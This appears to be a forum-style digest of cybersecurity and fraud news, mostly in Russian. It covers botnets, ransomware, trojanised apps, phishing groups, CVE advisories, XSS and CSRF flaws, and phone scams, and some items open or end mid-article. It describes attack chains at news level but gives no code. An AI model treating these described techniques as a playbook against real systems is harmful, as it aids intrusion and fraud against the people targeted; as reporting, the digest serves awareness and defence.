Noting that Amazon does not mandate a privacy policy for skills targeting children under the age of 13, the study raised concerns about the lack of widely available privacy policies in the "kids" and "health and fitness" categories.
"As privacy advocates we feel both 'kid' and 'health' related skills should be held to higher standards with respect to data privacy," the researchers said, while urging Amazon to validate developers and perform recurring backend checks to mitigate such risks.
"While such applications ease users' interaction with smart devices and bolster a number of additional services, they also raise security and privacy concerns due to the personal setting they operate in," they added.
Итоги борьбы с запрещённым контентом за 2024 год.
Мессенджер Telegram опубликовал данные о блокировке групп и каналов, нарушающих политику платформы и законодательство. Вкладка со статистикой появилась на официальном сайте компании.
В 2024 году было заблокировано 15,3 млн групп и каналов. Среди них — почти 702 тыс. сообществ, связанных с распространением материалов о сексуальном насилии над детьми, и около 129 тыс. групп и каналов с террористической направленностью. Помимо этого, было удалено более 100 млн фрагментов террористического контента.
На сайте компании сообщается, что Telegram ежедневно блокирует десятки тысяч групп и каналов, удаляя миллионы единиц запрещённого контента. Среди выявленных нарушений — призывы к насилию, распространение материалов о жестоком обращении с детьми и торговля нелегальными товарами.
Уточняется, что процесс модерации включает обработку жалоб пользователей и проактивный мониторинг. С 2015 года эти меры осуществляются с использованием технологий машинного обучения. В 2024 году Telegram внедрил новые инструменты на базе искусственного интеллекта, что позволило повысить эффективность выявления и блокировки запрещённых материалов.
telegram.org/moderation?setln=ru
Хакер из Узбекистана украл из зарубежных банков более $50 млн долларов. За это он был приговорен к восьми годам лишения свободы, сообщается в репортаже UzReport.
По словам парня, первое его дело было, когда он снял $15,2 млн. Также он украл $35 млн из банка Израиля, после чего перевел деньги в банки семи государств, дабы скрыть следы.
Хакера задержали на обратном пути в Россию из Турции, позже его передали узбекским правоохранителям. После этого он вернул деньги в банки Швейцарии, Бельгии, Польши, Южной Кореи и Израиля.
Мужчину признали виновным по статьям 168 (мошенничество), 177 (незаконное приобретение или сбыт валютных ценностей), 242 (организация преступного сообщества) и 243 (легализация доходов, полученных от преступной деятельности) Уголовного кодекса. Он был приговорен к восьми годам лишения свободы.
Легитимный инструмент для создания программных пакетов под названием Advanced Installer продолжает набирать популярность среди злоумышленников. Его эксплуатируют для установки вредоносного ПО, связанного с майнингом криптовалют, на зараженных компьютерах с ноября 2021 года.
«Злоумышленник применяет Advanced Installer, чтобы упаковать другие легитимные установщики, такие как Adobe Illustrator, Autodesk 3ds Max и SketchUp Pro, с вредоносными скриптами». — объясняет исследователь из Cisco Talos — Четан Рагхупрасад.
Ключевой элемент атаки — функция Custom Actions в Advanced Installer. Она позволяет автоматизировать процессы при установке программы. Инструмент задействует PowerShell-скрипт M3_Mini_Rat, который выступает как бэкдор, обеспечивая удаленный доступ к системе.
После активации бэкдора на компьютер жертвы устанавливаются криптовалютные майнеры PhoenixMiner и lolMiner. PhoenixMiner занимается добычей Ethereum, популярной для децентрализованных приложений, а lolMiner уникален тем, что может добывать две криптовалюты одновременно. Такая особенность многократно увеличивает эффективность атаки.
Проанализировав характер зараженных приложений, можно сделать вывод, что жертвы, вероятно, работают в сферах архитектуры, инжиниринга, строительства и развлечений. Установщики программ в основном используют французский язык, значит, под прицелом — франкоязычные пользователи.
Анализ DNS-запросов, отправленных на серверы хакеров, показывает, что футпринт жертв охватывает Францию и Швейцарию, за ними следуют единичные случаи заражения в США, Канаде, Алжире, Швеции, Германии, Тунисе, Мадагаскаре, Сингапуре и Вьетнаме.
Скорее всего, в атаках применялась тактика «SEO poisoning» или «отравления» поисковых систем, чтобы поднимать рейтинг установщиков в результатах поиска.
Еще один пример эксплуатации легитимных средств – сценарий атаки, который недавно изучила компания по кибербезопасности Check Point. Злоумышленники применяют Google Looker Studio, приложение для визуализации данных, чтобы создать поддельные сайты для кражи криптовалют. Этот алгоритм позволяет обходить традиционные средства защиты.
"В двух словах, хакеры пользуются авторитетом Google. Службы безопасности электронной почты, просматривая их письма, вероятно, решат, что сообщение не является фишинговым и отправлено от имени Google."
Троян предназначен для связи с удаленным сервером, хотя пока что сервер не реагирует на запросы, из-за чего сложно точно определить, какие именно типы вредоносного ПО могут через него распространяться.
В популярном мобильном приложении для сканирования штриховых кодов Barcode Scanner, насчитывающем более 10 млн установок, выявлена подстановка вредоносного кода. Проблема была разобрана исследователями из компании Malwarebytes после появления жалоб пользователей на автоматическое открытие других сайтов в браузере и появление всплывающих окон с предложениями по установке фиктивных антивирусных программ.
Как правило, появление подобной рекламы связано с установкой сомнительных программ из непроверенных источников, но в разбираемом случае пользователи давно не выполняли установку новых приложений, а все имеющиеся программ имели хорошую репутацию. Детальный анализ показал, что причиной вредоносной активности стало декабрьское обновление приложения Barcode Scanner, которое ранее не вызывало нареканий, пользовалось популярностью у пользователей и успешно проходило проверку Google Play Protect.
Пока не ясно, внедрение вредоносного кода было произведено в результате компрометации инфраструктуры, смены владельца или изменения намерений разработчиков, но обновление было заверено корректной цифровой подписью, которая использовалась и в прошлых выпусках. Гипотеза об использовании непроверенного нового фреймворка для монетизации была отвергнута так как вредоносный код был встроен и замаскирован с использованием методов обфускации для затруднения выявления. Вредоносная вставка классифицируется антивирусным ПО как троян Android/Trojan.HiddenAds.AdQR, осуществляющий подстановку рекламы,
После уведомления о проблеме компания Google удалила приложение из каталога Google Play, но пока не активировала принудительное удаление уже установленных экземпляров с устройств пользователей при помощи системы Google Play Protect.
• Source: [https://blog.malwarebytes.com/andro...lay-infects-10-million-users- with-one-update/](https://blog.malwarebytes.com/android/2021/02/barcode- scanner-app-on-google-play-infects-10-million-users-with-one-update/)
• Source: [https://forums.malwarebytes.com/top...e-redirect-not-same-as- others-posted-on-here/](https://forums.malwarebytes.com/topic/268286-android- chrome-redirect-not-same-as-others-posted-on-here/)
Аналитики китайской компании Qihoo 360 Netlab обнаружили новый ботнет ZHtrap, который превращает зараженные маршрутизаторы, DVR и прочие UPnP-устройства в приманки, которые помогают ему находить следующие цели для заражения.
ZHtrap основан на коде IoT-малвари Mirai и поддерживает архитектуры x86, ARM, MIPS и так далее.
Захватив устройство, ZHtrap предотвращает атаки других внедоносов с помощью белого списка, который разрешает только уже запущенные системные процессы, блокируя все остальное. Для связи с другими ботами он использует управляющие серверы, расположенные в Tor, а также Tor-прокси для сокрытия вредоносного трафика.
Основные цели ботнета: организация DDoS-атак и поиск новых уязвимых устройств для заражения. Кроме того, ZHtrap обладает функциями бэкдора, что позволяет его операторам загружать и выполнять дополнительные пейлоады.
Для распространения ZHtrap использует эксплоиты, нацеленные на четыре известные уязвимости в составе Realtek SDK Miniigd UPnP SOAP, MVPower DVR, Netgear DGN1000 и множестве моделей различных CCTV-DVR. Также малварь ищет устройства со слабыми паролями от Telnet и делает это по списку случайно сгенерированных IP-адресов, а также адресов, которые собирает с помощью специальных приманок (honeypot).
Создание приманок, пожалуй, является главной отличительной чертой ZHtrap. Малварь использует их для сбора IP-адресов устройств, которые могут быть уязвимы для его атак или уже заражены другим вредоносным ПО. Так, после установки приманка ZHtrap прослушивает список из 23 портов и отправляет все подключившиеся к ним IP-адреса в свой сканер в качестве возможных жертв для будущих атак.
Архитектура ZHtrap
«Ханипоты обычно используются ИБ-исследователями в качестве инструмента для перехвата атак, обнаружения сканов, эксплоитов и образцов [малвари]. Мы обнаружили, что ZHtrap применяет похожую технику, интегрировав ее с собственным модулем сканирования IP-адресов. Собранные IP-адреса в итоге используются в качестве целей для атак», — пишут эксперты Qihoo 360 Netlab.
Click to expand...
Источник: xakep.ru/2021/03/15/zhtrap/
«Оперативники уголовного розыска УМВД России по городскому округу Подольск совместно с коллегами из УМВД России по Центральному району города Санкт- Петербурга задержали подозреваемого в мошенничестве.
Предварительно установлено, что на мобильный телефон 92-летнего жителя Подольска поступил звонок от неизвестного, который представился сотрудником банка. Он сообщил пенсионеру, что с его счета пытаются похитить деньги. Под этим предлогом злоумышленник убедил пожилого человека снять все сбережения, чтобы передать их в службу безопасности кредитно-финансовой организации.
Мужчина дважды обращался в банк, получал наличные деньги и оба раза по указанию звонившего отдавал их незнакомцам, которые ожидали его в условных местах и называли кодовое слово. Сумма ущерба составила более десяти миллионов рублей.
Следователем Следственного управления УМВД России по городскому округу Подольск возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ.
В результате оперативно-розыскных мероприятий сотрудники полиции установили личность одного из подозреваемых в преступлении и задержали его на территории Санкт-Петербурга. По словам 28-летнего приезжего из Новосибирской области, он выполнял роль курьера. Согласно полученным от неизвестного через интернет- мессенджер инструкциям, молодой человек взял у пенсионера деньги и привез их к одному из московских торговых центров. В качестве платы за свои услуги он взял часть полученных средств, а остальное оставил в пакете возле служебного входа.
В ходе обысков по месту временного проживания фигуранта полицейские изъяли 17 мобильных телефонов, 41 банковскую карту, а также часть похищенных денежных средств и другие предметы, имеющие доказательственное значение. Подозреваемому избрана мера пресечения в виде заключения под стражу. Проводятся оперативно- розыскные мероприятия и следственные действия, направленные на установление и задержание всех участников противоправной деятельности».
Прокуроры за весь 2024 год направили в российские суды более 8000 исков к владельцам счетов, через которые выводились деньги, полученные в результате киберпреступлений. Как рассказал РИА Новости глава отдела по надзору за исполнением законов в сфере информационных технологий и защиты информации Генеральной прокуратуры России Олег Кипкаев, общая сумма требований к дропам составляет миллиард рублей.
Он добавил, что, по данным Росфинмониторинга, за последние два года «участниками сомнительных финансовых операций» стали не менее 170 тысяч несовершеннолетних. Через их банковские карты были проведены 75 миллиардов рублей.
Ранее Росфинмониторинг уже просил ускорить борьбу с мошенническими онлайн- схемами. Тогда же был разработан законопроект об уголовной ответственности за дропперство. При этом известно, что с начала 2023 года по середину 2024-го банки отказали в проведении 4000 подозрительных переводов на карты дропов на общую сумму 4,5 миллиарда рублей. Против их владельцев было возбуждено 400 уголовных дел.
ria.ru/20241121/moshennichestvo-1985021227.html
Следователем Следственного управления УМВД России по Белгородской области окончено предварительное расследование уголовного дела в отношении одного из предполагаемых участников межгосударственной преступной группы. Он обвиняется в совершении 80 эпизодов мошенничества.
«По версии следствия, злоумышленник возглавлял действовавшее в Московском регионе подразделение международной криминальной структуры. Установлено, что ее организаторы находятся в одном из государств ближнего зарубежья, где располагается сеть кол-центров. Их работники обзванивали россиян, представляясь юристами и сотрудниками правоохранительных органов.
Гражданам сообщали, что за ранее приобретенные лекарственные препараты и биологически активные добавки им полагается компенсация, которая многократно превышает стоимость купленного товара. Обещанные аферистами суммы достигали нескольких миллионов рублей. Однако для их получения требовалось заранее оплатить страховку или налог. Потерпевшие, большинство из которых пожилые люди, перечисляли деньги на реквизиты, указанные мошенниками, после чего те переставали отвечать на звонки», - рассказала официальный представитель МВД России Ирина Волк.
В задачу московского участника группы входил контроль за подбором россиян, на которых оформлялись используемые в криминальной схеме банковские карты. Он также занимался переводом похищенных средств за рубеж и распределением доходов между российскими соучастниками преступлений. В результате противоправной деятельности у жителей 50 регионов нашей страны похищено в общей сложности свыше 20 миллионов рублей.
«Пятеро сообщников задержаны в прошлом году оперативниками УМВД России по Белгородской области во взаимодействии с коллегами из ГУУР МВД России при поддержке сотрудников Росгвардии. Основной фигурант заключил со следствием досудебное соглашение, уголовное дело в отношении него направлено в суд для рассмотрения по существу. Расследование уголовных дел в отношении других соучастников продолжается», - сообщила Ирина Волк.
Команда BI ZONE Threat Intelligence наблюдает за группировкой Scaly Wolf с лета 2023. Злоумышленники активно рассылают фишинговые письма от лица российских государственных служб с призывом запустить вредоносный файл. Хакеры выделяются среди остальных групп юридической грамотностью, поэтому многие пользователи рискуют попасться на удочку киберпреступников.
Еще примечательно то, что разработчики стилера запретили применять его на территории России и СНГ, но Scaly Wolf сумела обойти ограничение. Для этого злоумышленники отключили функцию, которая немедленно прекращала работу программы при ее запуске на устройстве с IP-адресом из заблокированных регионов.
Click to expand...
По мнению специалистов, атаки на российские компании будут продолжаться еще долго и, скорее всего, по той же схеме — с использованием фишинговых рассылок для распространения стилера.
Преступник осужден на 10 лет за отмывание $4,5 млн через взлом email и романтические схемы.
Минюст США приговорило 31-летнего мужчину к 10 годам тюремного заключения за отмывание более $4,5 миллионов с помощью BEC и романтического мошенничества.
Согласно судебным документам, Малачи Маллингс открыл 20 банковских счетов на имя несуществующей компании The Mullings Group LLC., которые служили каналом для отмывания мошеннических доходов как минимум с 2019 года по июль 2021 года.
Организованная схема принесла миллионы долларов благодаря BEC-атакам, нацеленным на программу медстрахования, частные компании и другие организации, а также схемам romance scam, нацеленным на пожилых людей.
BEC-атака — форма целенаправленной кибератаки, в которой злоумышленники обманом заставляют ничего не подозревающих руководителей и сотрудников отправлять деньги или конфиденциальные данные на счета мошенников, используя различные уловки социальной инженерии. Подобные атаки направлены на обман компаний, часто используя скомпрометированные учетные записи для рассылки фишинговых писем поставщикам, призывая их осуществить банковский перевод или изменить банковские реквизиты для будущих платежей.
Отмечается, что вместе со своими сообщниками Маллингс участвовал в финансовых операциях, направленных на сокрытие доходов от мошенничества, и использовал часть доходов для приобретения предметов роскоши, таких как дорогие автомобили и ювелирные изделия.
В одном случае Маллингс отмыл $310 000, которые были обманным путем переведены из соцпрограммы Medicaid и предназначались для возмещения расходов больницы. В другом случае Маллингс заработал $260 000 в результате мошенничества romance scam, которые он использовал для покупки Ferrari.
В январе 2023 года Маллингс признал себя виновным по одному пункту обвинения в сговоре с целью отмывания денег и семи пунктам обвинения в различных преступлениях, связанных с отмыванием денег.
sc: justice[.]gov/opa/pr/man-sentenced-laundering-over-45m-obtained-business- email-compromise-and-romance-fraud
Новый ransomware Agenda обнаружили исследователи Trend Micro, который уже показал себя в дикой природе и держит в страхе учреждения здравоохранения и образования Индонезии, Саудовской Аравии, Южной Африки и Таиланда.
Ransomware написан на языке Golang и может быть настроен для каждой жертвы.
Из примечательного Agenda способен перезагружать систему в безопасном режиме и останавливать некоторые специфичные для сервера процессы и службы, что позволяет ему работать в нескольких режимах.
Agenda предоставляется, как услуга и злоумышленник под ником Qilin, рекламирующий программу-вымогатель в даркнете, предоставляет партнерам возможность адаптировать бинарные полезные нагрузки для каждой жертвы, позволяя операторам выбирать примечание о выкупе, расширение шифрования, а также список процессов и сервисов для завершения до начала процесса шифрования.
Кроме того, малварь включает в себя методы уклонения от обнаружения, используя функцию «безопасного режима» устройства, что позволяет незаметно осуществлять процедуру шифрования файлов.
Помимо использования данных локальной учетной записи для запуска бинарного файла вымогателя, вредоносное ПО имеет возможность заразить всю сеть и ее общие драйверы.
После успешного шифрования Agenda переименовывает файлы с настроенным расширением, удаляет примечание о выкупе в каждом зашифрованном каталоге и перезагружает машину в обычном режиме.
Запрашиваемая сумма выкупа варьируется в зависимости от жертвы в диапазоне от
50 000 до 800 000 долларов.
В одной из наблюдаемых
цепочек атак с использованием Agenda первоначальной точкой входа служил
общедоступный сервер Citrix и злоумышленникам понадобилось менее двух дней для
окончательного развертывания программы-вымогателя.
Trend Micro заявила, что обнаружила сходство исходного кода между семействами программ-вымогателей Black Basta , Black Matter и REvil (он же Sodinokibi).
Agenda является уже четвертым штаммом после BlackCat, Hive и Luna, использующим язык программирования Go.
Никто не стоит на месте и ransomware продолжают развиваться, разрабатывая более изощренные методы и приемы для захвата организаций.
Source: <https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-
agenda-customizes-attacks.html>
На этой неделе компания Microsoft выпустила обновления безопасности для Exchange Server, которые устраняют набор из четырех уязвимостей, оцененных как серьезные и критические. Все проблемы ведут к удаленному выполнению произвольного кода и некоторые из них были обнаружены специалистами АНБ.
Новые баги затрагивают Exchange Server с 2013 по 2019, и, хотя нет никаких доказательств того, что они использовались в реальности, Microsoft считает, что злоумышленники, скорее всего, воспользуются ими и скоро создадут эксплоиты.
Уязвимости получили идентификаторы [CVE-2021-28480](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-28480), [CVE-2021-28481](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-28481), [CVE-2021-28482](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-28482), [CVE-2021-28483](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-28483). По словам эксперта Microsoft Кевина Бомонта (Kevin Beaumont), наиболее серьезные из них имеют критическую степень серьезности (9,8 баллов из 10 по шкале CVSS v3) и могут использоваться без аутентификации. Ещt один критический баг оценивается на 9 баллов из 10, наименее серьезный — 8,8 баллов.
Все баги получили исправления в рамках апрельского «вторника обновлений» Microsoft, который принес патчи для 108 уязвимостей, пять из которых представляют собой уязвимости нулевого дня (одна из них уже используется для атак).
По данным Microsoft, информация о следующих четырех уязвимостях была обнародована публично, но проблемы не использовались хакерами:
Еще одна уязвимость, обнаруженная исследователями «Лаборатории Касперского», использовалась злоумышленниками. Баг [был найден](https://securelist.com/zero- day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the- wild/101898/) в Desktop Window Manager и позволял повысить привилегии пользователя в системе, ему был присвоен номер [CVE-2021-28310](http://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2021-28310).
У исследователей есть данные об использовании этого эксплоита злоумышленниками, причем, возможно, сразу несколькими группировками (в частности, BITTER APT). Он позволяет атакующим повысить права пользователя в системе и затем выполнить произвольный код на устройстве жертвы. На данном этапе у экспертов «Лаборатории Касперского» нет полной информации обо всей цепочке заражения, но сообщается, что есть вероятность, что этот эксплоит используется совместно с другими браузерными эксплоитами для обхода песочниц или получения привилегий в системе.
Источник: xakep.ru/2021/04/15/exchange-nsa/
Эксперт Positive Technologies Александр Попов выявил и исправил пять похожих уязвимостей в виртуальных сокетах ядра Linux. Эти уязвимости могут быть использованы для локального повышения привилегий, и Александр подтвердил возможность атаки на Fedora 33 Server. Уязвимости получили общий идентификатор CVE-2021-26708 и оценку 7,0 по шкале CVSS v3, что соответствует высокому уровню опасности.
К проблеме безопасности ядра привели ошибки типа «состояние гонки» , которые были неявно внесены при добавлении поддержки нескольких транспортов для виртуальных сокетов. Эта функциональность появилась в ядре Linux версии 5.5 в ноябре 2019 года. Уязвимые драйверы (CONFIG_VSOCKETS и CONFIG_VIRTIO_VSOCKETS) поставляются как ядерные модули основными дистрибутивами GNU/Linux. Данные модули автоматически загружаются системой при создании сокета AF_VSOCK, и это действие доступно непривилегированному пользователю.
«Мне удалось разработать прототип эксплоита, который выполняет локальное повышение привилегий на Fedora 33 Server и обходит защитные механизмы SMEP и SMAP платформы x86_64. Это исследование в дальнейшем позволит усовершенствовать средства защиты ядра Linux», — уточнил Александр Попов.
Click to expand...
Александр подготовил исправления и выполнил ответственное разглашение уязвимостей. Патч уже принят в ванильное ядро Linux v5.11-rc7, а также применен в стабильных ветках, которые были подвержены CVE-2021-26708.
Источник: xakep.ru/2021/03/03/cve-2021-26708/
Разработчики Adobe выпустили экстренное обновление для устранения критической уязвимости, затрагивающей ColdFusion версий 2021 (включая 2021.0.0.323925), 2016 и 2018.
Проблема получила идентификатор CVE-2021-21087 и связана с некорректной проверкой правильности ввода (Improper Input Validation). Эксплуатация этой проблема может привести к удаленному выполнению произвольного кода.
В собственной классификации Adobe уязвимость получила класс приоритета 2, а это означает, что для проблемы пока нет известных эксплоитов, но она влияет на продукт, который исторически подвергается повышенному риску.
Разработчики подчеркивают, что необходимо также обновить ColdFusion JDK/JRE до последних версий (LTS до 1.8 и JDK до 11). Дело в том, что установка патча на ColdFusion, но без соответствующего обновления JDK, не защитит сервер.
Источник: xakep.ru/2021/03/23/coldfusion-patch/
На прошлой неделе испанская полиция арестовала серверы Android-приложения Mobdro, предназначенного для стриминга пиратского видео, которым пользовались около 43 000 000 человек (более 100 000 000 загрузок). Издание TorrentFreak отмечает, что популярность Mobdro можно сравнить с Popcorn Time, Showbox и Terrarium TV, ведь благодаря прямой трансляция, спортивным каналам и другому контенту Mobdro было одним из фаворитов пользователей.
По информации Евроюста, расследование деятельности Mobdro началось еще в 2018 году, после жалоб со стороны Профессиональной футбольной лиги Испании (Ла Лига), Премьер-лиги и Alliance for Creativity and Entertainment. В итоге в прошлом месяце объединенные усилия Европола, Интерпола, Евроюста и властей Испании привели к операции против бывшего гражданина Испании, перебравшегося в Андорру, и трех работавших на него инженеров. Правоохранители предприняли следующие действия:
Так как Mobdro использовали для просмотра нелицензионного контента около 43 000 000 пользователей, правоохранители считают, что владельцы приложения заработали на нем более 5 000 000 евро.
Прибыль в основном приносили показы рекламы внутри приложения и продажа личных данных пользователей рекламодателям. Однако испанские власти заявляют, что «по мере продвижения расследования» полиция обнаружила еще один источник дохода: приложение регистрировало пользовательские устройств в сети другой компании. Власти Испании и Европол не раскрывают названия этой компании, но утверждают, что она использовала зараженные устройства в качестве прокси для тех, кому нужна анонимность, а также применяла их для организации DDoS-атак.
Нужно сказать, что для ИБ-экспертов вредоносная функциональность Mobdro не стала сюрпризом. Еще в 2019 году специалисты компании Digital Citizens писали в своем отчете, что приложение опасно и связано с ботнетом. Исследователи приводили следующие факты:
Источник: xakep.ru/2021/03/17/mobdro/
An CRSF-to-stored-XSS security bug plagues 50,000 ‘Contact Form 7’ Style
users.
A security bug in Contact Form 7 Style, a WordPress plugin installed on over
50,000 sites, could allow for malicious JavaScript injection on a victim
website.
The latest [WordPress plugin security
vulnerability](https://threatpost.com/wordpress-pop-up-builder-plugin-flaw-
plagues-200k-sites/163500/) is a cross-site request forgery (CSRF) to stored
cross-site scripting (XSS) problem in Contact Form 7 Style, which is an add-on
to the well-known Contact Form 7 umbrella plugin. It ranks 8.8 out of 10 on
the CVSS vulnerability-severity scale (CVE is pending).
CSRF allows an attacker to induce a victim user to perform actions that they
do not intend to. XSS allows an attacker to execute arbitrary JavaScript
within the browser of a victim user. This bug connects the two approaches.
[](https://threatpost.com/newsletter-
sign/)
Researchers at Wordfence said that there’s no patch yet available, and
versions 3.1.9 and below are affected. WordPress removed the plugin from the
WordPress plugin repository on Feb. 1.
Contact Form 7 is used to
create, as its name suggests, contact forms used by websites. The vulnerable
Contact Form 7 Style is an add-on that can be used to add additional bells and
whistles to those forms that are made with Contact Form 7.
It does this by allowing users to customize a site’s Cascading Style Sheets
(CSS) code, which is used to dictate the appearance of WordPress-based
websites. This is where the vulnerability lies, according to Wordfence
researchers.
“Due to the lack of sanitization and lack of nonce protection on this feature,
an attacker could craft a request to inject malicious JavaScript on a site
using the plugin,” they explained, [in a
posting](https://www.wordfence.com/blog/2021/02/unpatched-
vulnerability-50000-wp-sites-must-find-alternative-for-contact-form-7-style/)
this week, adding that further details will be withheld to give site owners a
chance to address the issue. “If an attacker successfully tricked a site’s
administrator into clicking a link or attachment, then the request could be
sent and the CSS settings would be successfully updated to include malicious
JavaScript.”
Since the number of installed instances for the plugin is so high, Due to the
number of sites affected by this plugin’s closure, we are intentionally
providing minimal details about this vulnerability to provide users ample time
to find an alternative solution. We may provide additional details later as we
continue to monitor the situation.
To exploit the flaw, cyberattackers would need to convince a logged-in
administrator to click on a malicious link, which can be done via any of the
common social-engineering approaches (i.e., through a fraudulent email or
instant message).
Wordfence notified the plugin’s developer about the bug in early December;
after receiving no response, the researchers then escalated the issue to the
WordPress Plugins team in early January. The WordPress Plugins team also
contacted the developer with no response, leading to the disclosure this week.
Because, as with all CSRF vulnerabilities, the bug can only be exploited if an
admin user performs an action while authenticated to the vulnerable WordPress
site, admins should always be wary when clicking on any links.
“If you feel you must click a link, we recommend using incognito windows when
you are unsure about a link or attachment,” according to Wordfence. “This
precaution can protect your site from being successfully exploited by this
vulnerability along with all other CSRF vulnerabilities.”
In this case, users should also deactivate and remove the Contact Form 7 Style
plugin and find a replacement, researchers added, since no patch appears to be
forthcoming.
Компания Trend Micro опубликовала отчёт о деятельности киберпреступной группы Impulse Team, которая занимается мошенничеством с криптовалютами. По данным исследователей, группа существует с 2018 года и нацелена на жителей России и стран СНГ.
Схема мошенников заключается в том, что хакеры создают фальшивые сайты и приложения для торговли криптовалютами, которые выдают за легитимные платформы. Затем киберпреступники привлекают жертв через соцсети, рекламу, спам и другие каналы. Жертвы регистрируются на поддельных сайтах и вносят депозиты в криптовалюте, которые затем уходят на кошельки мошенников.
Все обнаруженные сайты принадлежат партнерской программе Impulse Project, рекламируемой на нескольких русскоязычных криминальных форумах. Чтобы стать частью проекта, новым аффилиатам необходимо связаться с Impulse Team и подписаться на услугу.
По словам исследователей, Impulse Team использует различные приёмы для убеждения жертв вложить больше денег или не выводить свои средства. Например, они предлагают бонусы, льготы, консультации и поддержку. Также злоумышленники имитируют торговые операции и прибыль на счетах жертв, чтобы создать видимость успешной торговли. Если жертва пытается вывести свои средства, то ей ставят различные препятствия, такие как необходимость оплатить комиссию, налог или штраф.
Исследователи Trend Micro обнаружили более 150 поддельных сайтов и приложений, связанных с Impulse Team. Также выявлено около 170 кошельков Bitcoin и Ethereum, на которые поступали депозиты жертв. По оценкам экспертов, общая сумма похищенных средств составляет около $50 млн.
source: trendmicro.com/en_us/research/23/f/impulse-team-massive- cryptocurrency-scam.html
По версии следствия, уроженец Луцка, в мае 2021 года, имея специальные технические знания в сфере программирования, нашел в сети Интернет файлы фишинговых скриптов, с помощью которых осуществляется несанкционированный доступ к аккаунтам социальных сетей и электронным почтовым ящикам. Далее, с целью сбыта вышеуказанного вредоносного ПО, мужчина авторизовался на специальном форуме под сетевым псевдонимом "forestgram963", где разместил объявление о продаже указанного ПО.
22 декабря 2021 года, по результатам проведения специального следственного эксперимента, преступник сбыл за вознаграждение архивный файл размером 8,64 Мб под названием «Архив.zip» с инструкцией по его использованию.
Обвинительный акт поступил в суд с соглашением о признании виновности, заключенным 21 января 2022 года между прокурором и подозреваемым, согласно которому стороны пришли к согласию по формулированию обвинения, существенных для соответствующего уголовного производства обстоятельств и правовой квалификации действий обвиняемого по ч.1 ст.361-1 УК Украины, который в полном объеме сформулированного обвинения признал свою виновность в совершении указанного преступления. Сторонами было согласовано, что при утверждении соглашения обвиняемому будет назначено наказание в виде штрафа в размере 42500 грн.
Суд утвердил соглашение о признании виновности.
Группировка OnePercent давно сотрудничает с создателями и операторами вымогателя REvil (Sodinokibi), а также Maze и Egregor.
Федеральное бюро расследований США опубликовало свое первое публичное уведомление, в котором подробно описываются методы работы партнера вымогательских группировок.
Партнер вымогательской группировки представляет собой человека или группу лиц, которые арендуют доступ к вредоносному ПО по бизнес-модели Ransomware-as-a- Service (RaaS), организуют взлом корпоративных сетей, шифруют файлы с помощью «арендованной программы-вымогателя», а затем получают комиссию от успешных выплат.
Партнер, указанный ФБР под названием OnePercent Group, был активен как минимум с ноября 2020 года. Согласно отчету ФБР, группировка в ходе своих атак организовывала фишинговые почтовые кампании для заражения жертв трояном IcedID, использовала IcedID для установки дополнительных полезных нагрузок в зараженных сетях, использовала фреймворк для постэксплуатации Cobalt Strike для перемещения по сети жертвы, использовала RClone для кражи конфиденциальных данных с серверов жертвы, зашифровывала данные и затем требовала выкуп, а также звонила или отправляла электронное письмо жертвам с угрозами продать украденные данные в даркнете в случае отказа заплатить выкуп.
Получив доступ к сети жертвы, OnePercent Group оставляла записку с требованием выкупа. Если жертва не выполняла требование преступников и не выходила на связь с группировкой, группа применяла ответные меры с угрозой утечки данных. Угрозы отправлялись по электронной почте или по телефону. Если жертва не платила достаточно быстро, группировка публиковала 1% украденных данных в качестве предупреждения. Если жертвы после этого не хотели платить, группа угрожала продать данные жертвы на сайте утечек данных REvil.
Хотя ФБР специально не называло эту группу дочерней вымогательской группировкой, источники в сфере кибербезопасности сообщили, что OnePercent давно сотрудничает с создателями и операторами вымогателя REvil (Sodinokibi), а также Maze и Egregor.
Опубликованное сообщение ФБР по безопасности является важным шагом в разъяснении того, как на самом деле работает экосистема киберпреступности. ФБР не сообщило, активна ли группировка OnePercent в настоящее время.
Source: ic3.gov/Media/News/2021/210823.pdf
Онлайн-мошенники ввели в заблуждение как минимум 93 тыс. пользователей Android-смартфонов, обманом заставив их приобрести приложения для майнинга криптовалюты. Об этом рассказали в своём отчёте специалисты компании Lookout.
В общей сложности эксперты насчитали 172 фейковые программы, которые разделили на два семейства: BitScam (83 800 установки) и CloudScam (9 600 установок). Мошенники преподносили их как облачные сервисы для добычи цифровой валюты.
25 приложений из этого набора спокойно располагались в официальном магазине Google Play Store. Остальной софт жертвы могли скачать из сторонних источников. В отчёте Lookout эксперты уточняют, что поддельные приложения и близко не располагали теми функциональными возможностями, о которых заявляли авторы.
В результате мошенники просто набивали свои кошельки за счёт доверчивых пользователей, купивших приложения. В общей сложности у жертв выудили $350 000 ($300 тыс. — за счёт продажи самих приложений, ещё $50 тыс. — посредством фейковых обновлений). На удочку преступников попались тысячи любителей Android по всему миру.
«Этим приложениям удалось остаться незамеченными по одной простой причине — они не выполняли никаких вредоносных действий. В сущности, этот софт — пустая оболочка, за которой нет никакой функциональности», — объясняют эксперты Lookout.
Более того, CloudScam и BitScam предлагали ещё и подписку, если пользователь по каким-то причинам не мог купить приложение в Google Play Store. К слову, за фейковый софт можно заплатить в том числе цифровой валютой — в биткоинах или Ethereum.
Google уже приняла соответствующие меры, удалив все поддельные программы из официального магазина. Тем не менее стоит учитывать, что на сторонних площадках они всё ещё есть.
• Source: <https://blog.lookout.com/lookout-unearths-android-crypto-mining- scams>
• Source: <https://www.lookout.com/documents/factsheet/us/lookout-appendix-a- iocs.pdf>
В каталогах приложений, построенных на основе платформы Pling, выявлена уязвимость, позволяющая совершить XSS-атаку для выполнения JavaScript-кода в контексте других пользователей. Проблеме подвержены такие сайты, как store.kde.org, appimagehub.com, gnome-look.org, xfce-look.org и pling.com.
Суть проблемы в том, что платформа Pling допускает добавление мультимедийных
блоков в формате HTML, например, для вставки ролика с YouTube или изображения.
Добавляемый через форму код не проверяется должным образом, что позволяет под
видом изображения добавить код вида "" и
разместить в каталоге информацию, при просмотре которой будет запущен
JavaScript-код. Если информация будет открыта пользователям, имеющим учётную
запись, то можно инициировать совершение в каталоге действий от имени данного
пользователя, в том числе добавить вызов JavaScript на его страницы,
реализовав подобие сетевого червя.
